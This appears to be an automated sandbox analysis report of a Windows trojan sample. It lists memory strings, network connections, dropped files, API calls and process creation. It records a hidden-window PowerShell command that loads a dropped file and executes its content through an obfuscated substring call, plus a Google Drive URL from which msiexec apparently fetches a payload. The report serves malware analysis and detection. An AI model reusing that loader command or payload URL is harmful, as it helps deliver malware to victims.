Source: msiexec.exe, 00000006.00000003.3128128204.0000000008953000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3258764591.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3294650139.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3034643119.0000000008953000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2999349054.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2928524613.0000000008953000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3342005000.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3010879798.0000000008953000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2951191578.0000000008953000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3116601337.0000000008953000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2987663105.0000000008953000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3375721612.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3389908323.0000000008921000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3272194025.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3022070697.0000000008950000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3389908323.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2940123153.0000000008953000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3104944814.0000000008953000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2975192290.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3021978943.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3092662309.0000000008953000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: msiexec.exe, 00000006.00000003.3092662309.0000000008953000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/B
Source: msiexec.exe, 00000006.00000003.3306010577.000000000894E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download
Source: msiexec.exe, 00000006.00000003.3010879798.0000000008953000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download#
Source: msiexec.exe, 00000006.00000003.2928335469.0000000008953000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download$
Source: msiexec.exe, 00000006.00000003.3128128204.0000000008953000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3116601337.0000000008953000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3144014777.0000000008953000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download9w
Source: msiexec.exe, 00000006.00000003.3375721612.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3389908323.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3353015327.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3364613399.000000000894E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=downloadGw
Source: msiexec.exe, 00000006.00000003.3258764591.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3246654914.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3235246525.000000000894E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=downloadHw
Source: msiexec.exe, 00000006.00000003.2951191578.0000000008953000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3223710757.000000000898B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3223643370.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3212329837.000000000894E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=downloadIN
Source: msiexec.exe, 00000006.00000003.3258764591.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3272194025.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3283115418.000000000894E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=downloadVw
Source: msiexec.exe, 00000006.00000002.3389908323.0000000008921000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2940267464.0000000008932000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3389908323.00000000088DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=downloade
Source: msiexec.exe, 00000006.00000003.3258764591.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3272194025.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2975192290.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3188962852.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3246654914.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3154893451.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3223643370.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3144014777.0000000008953000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2975340648.0000000008950000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3235246525.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3177857063.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3166122058.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3212329837.000000000894E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=downloadew
Source: msiexec.exe, 00000006.00000003.2940267464.000000000893C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3389908323.000000000893C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=downloadj
Source: msiexec.exe, 00000006.00000003.2987663105.0000000008953000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=downloadx
Source: msiexec.exe, 00000006.00000003.3128128204.0000000008953000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3258764591.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3294650139.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3034643119.0000000008953000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2999349054.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2928524613.0000000008953000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3342005000.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3010879798.0000000008953000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2951191578.0000000008953000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3116601337.0000000008953000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2987663105.0000000008953000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3375721612.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3272194025.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3022070697.0000000008950000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3389908323.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2940123153.0000000008953000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3104944814.0000000008953000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2975192290.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3021978943.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3092662309.0000000008953000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2928335469.0000000008953000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/~
Source: msiexec.exe, 00000006.00000003.3306010577.000000000894E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: msiexec.exe, 00000006.00000003.3069103263.00000000089A0000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3212329837.000000000894E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://translate.google.com/translate_a/element.js
Source: msiexec.exe, 00000006.00000003.3069103263.00000000089A0000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3212329837.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3128128204.0000000008947000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
Source: msiexec.exe, 00000006.00000003.3069103263.00000000089A0000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3212329837.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3128128204.0000000008947000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com/analytics.js
Source: msiexec.exe, 00000006.00000003.3212329837.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3306010577.000000000894E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: msiexec.exe, 00000006.00000003.3306010577.000000000894E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: msiexec.exe, 00000006.00000003.3212329837.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3306010577.000000000894E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: msiexec.exe, 00000006.00000003.3212329837.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3306010577.000000000894E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 57059 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57084 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57080 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57061 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57088 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57065 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57071 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57058
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57059
Source: unknown	Network traffic detected: HTTP traffic on port 57069 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57094 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57096
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57097
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57098
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57099
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57092
Source: unknown	Network traffic detected: HTTP traffic on port 57090 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57093
Source: unknown	Network traffic detected: HTTP traffic on port 57075 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57094
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57095
Source: unknown	Network traffic detected: HTTP traffic on port 57079 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57098 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57090
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57091
Source: unknown	Network traffic detected: HTTP traffic on port 57058 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57085 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57081 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57060 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57064 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57089 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57067
Source: unknown	Network traffic detected: HTTP traffic on port 57095 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57068
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57069
Source: unknown	Network traffic detected: HTTP traffic on port 57068 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57063
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57064
Source: unknown	Network traffic detected: HTTP traffic on port 57074 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57065
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57066
Source: unknown	Network traffic detected: HTTP traffic on port 57070 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57060
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57061
Source: unknown	Network traffic detected: HTTP traffic on port 57078 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57091 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57062
Source: unknown	Network traffic detected: HTTP traffic on port 57099 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57082 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57063 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57086 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57078
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57079
Source: unknown	Network traffic detected: HTTP traffic on port 57096 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57067 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57074
Source: unknown	Network traffic detected: HTTP traffic on port 57092 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57073 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57075
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57077
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57070
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57071
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57072
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57073
Source: unknown	Network traffic detected: HTTP traffic on port 57077 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57083 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57062 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57066 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57087 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57089
Source: unknown	Network traffic detected: HTTP traffic on port 57093 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57085
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57086
Source: unknown	Network traffic detected: HTTP traffic on port 57072 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57087
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57088
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57081
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57082
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57083
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57084
Source: unknown	Network traffic detected: HTTP traffic on port 57097 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57080

Source: unknown	HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.6:57058 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.6:57059 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.6:57060 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.6:57062 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.6:57068 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.6:57070 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.6:57072 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.6:57077 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.6:57080 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.6:57081 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.6:57082 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.6:57083 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.6:57089 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.6:57093 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.6:57095 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.6:57097 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.6:57099 version: TLS 1.2

Source: C:\Users\user\Desktop\vq6jxdGvD6.exe

Code function: 0_2_00405194 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00405194

System Summary

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\unshabbily\Toral\vq6jxdGvD6.exe

Jump to dropped file

Source: C:\Users\user\Desktop\vq6jxdGvD6.exe

Code function: 0_2_004031BB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_004031BB

Source: C:\Users\user\Desktop\vq6jxdGvD6.exe	Code function: 0_2_004049D3		0_2_004049D3
Source: C:\Users\user\Desktop\vq6jxdGvD6.exe	Code function: 0_2_004065BB		0_2_004065BB

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\nsb129A.tmp\Banner.dll B91763928CE210BFC0A43B0AC1178D68CB95CFAD68439B25B55A53B7AA53B207
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\nsb129A.tmp\UserInfo.dll 01D867E3A1F0AEC39A4FF02FE9FAFEFC78D6A12390A0DA8ECBF4E7DA5379E42E

Source: vq6jxdGvD6.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.evad.winEXE@6/14@2/2

Source: C:\Users\user\Desktop\vq6jxdGvD6.exe

0_2_004031BB

Source: C:\Users\user\Desktop\vq6jxdGvD6.exe

Code function: 0_2_00404460 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

0_2_00404460

Source: C:\Users\user\Desktop\vq6jxdGvD6.exe

Code function: 0_2_004020CB CoCreateInstance,MultiByteToWideChar,

0_2_004020CB

Source: C:\Users\user\Desktop\vq6jxdGvD6.exe

File created: C:\Users\user\AppData\Local\unshabbily

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6844:120:WilError_03

Source: C:\Users\user\Desktop\vq6jxdGvD6.exe

File created: C:\Users\user\AppData\Local\Temp\nsv1057.tmp

Jump to behavior

Source: vq6jxdGvD6.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process

Source: C:\Users\user\Desktop\vq6jxdGvD6.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\vq6jxdGvD6.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: vq6jxdGvD6.exe	Virustotal: Detection: 64%
Source: vq6jxdGvD6.exe	ReversingLabs: Detection: 70%

Source: C:\Users\user\Desktop\vq6jxdGvD6.exe

File read: C:\Users\user\Desktop\vq6jxdGvD6.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\vq6jxdGvD6.exe "C:\Users\user\Desktop\vq6jxdGvD6.exe"
Source: C:\Users\user\Desktop\vq6jxdGvD6.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Subpilose=Get-Content -raw 'C:\Users\user\AppData\Local\unshabbily\Efterlysningernes.Squ';$Stunning=$Subpilose.SubString(53085,3);.$Stunning($Subpilose)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Users\user\Desktop\vq6jxdGvD6.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Subpilose=Get-Content -raw 'C:\Users\user\AppData\Local\unshabbily\Efterlysningernes.Squ';$Stunning=$Subpilose.SubString(53085,3);.$Stunning($Subpilose)"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior

Source: C:\Users\user\Desktop\vq6jxdGvD6.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\vq6jxdGvD6.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\vq6jxdGvD6.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\vq6jxdGvD6.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\vq6jxdGvD6.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\vq6jxdGvD6.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\vq6jxdGvD6.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\vq6jxdGvD6.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\vq6jxdGvD6.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\vq6jxdGvD6.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\vq6jxdGvD6.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\vq6jxdGvD6.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\vq6jxdGvD6.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\vq6jxdGvD6.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\vq6jxdGvD6.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\vq6jxdGvD6.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\vq6jxdGvD6.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\vq6jxdGvD6.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\vq6jxdGvD6.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\vq6jxdGvD6.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\vq6jxdGvD6.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\vq6jxdGvD6.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\vq6jxdGvD6.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\vq6jxdGvD6.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\vq6jxdGvD6.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
